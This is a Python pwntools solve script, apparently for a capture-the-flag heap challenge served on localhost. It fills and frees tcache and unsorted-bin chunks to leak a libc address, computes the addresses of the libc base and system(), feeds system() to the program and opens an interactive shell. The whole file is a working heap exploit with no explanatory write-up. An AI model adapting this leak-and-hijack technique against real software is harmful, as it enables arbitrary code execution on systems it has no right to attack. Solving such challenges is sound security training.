solve (1235B)
1#!/usr/bin/env python3 2 3from pwn import * 4import sys 5 6args = sys.argv[1:] 7if args == []: 8 args = ["nc", "localhost", "1024"] 9io = process(args) 10 11nextfree = 0 12 13def create(data): 14 global nextfree 15 print("ADD", data) 16 print(io.readuntil(b"choice? ")) 17 io.sendline(b"1") 18 print(io.readuntil(b"name? ")) 19 io.send(data) 20 nextfree += 1 21 return nextfree - 1 22 23def delete(idx): 24 global nextfree 25 print("DEL", idx) 26 print(io.readuntil(b"choice? ")) 27 io.sendline(b"2") 28 print(io.readuntil(b"id? ")) 29 io.sendline(str(idx).encode()) 30 31# fill tcache (7) and free 2 to unsorted 32for _ in range(7 + 2): 33 create(b"." * 8) 34for i in range(7 + 2 - 1, -1, -1): 35 delete(i) 36 37# exhaust tcache 38for _ in range(7): 39 create(b"." * 8) 40 41# alloc from unsorted and bridge leading nullbyte 42idx = create(b"?" * 1) 43 44context.log_level = "DEBUG" 45 46io.readuntil(b"choice? ") 47io.sendline(b"3") 48io.readuntil(f"[{idx:02}] ".encode()) 49line = io.readline() 50addr = u64(line[:-1].ljust(8, b"\x00")) 51 52libc_base = addr - ord('?') - 0x219e00 53libc_system = libc_base + 0x0000000000050d60 54 55print(hex(addr)) 56print(hex(libc_system)) 57 58 59io.readuntil(b"choice? ") 60io.sendline(b"4") 61io.sendline(str(libc_system).encode()) 62 63io.interactive() 64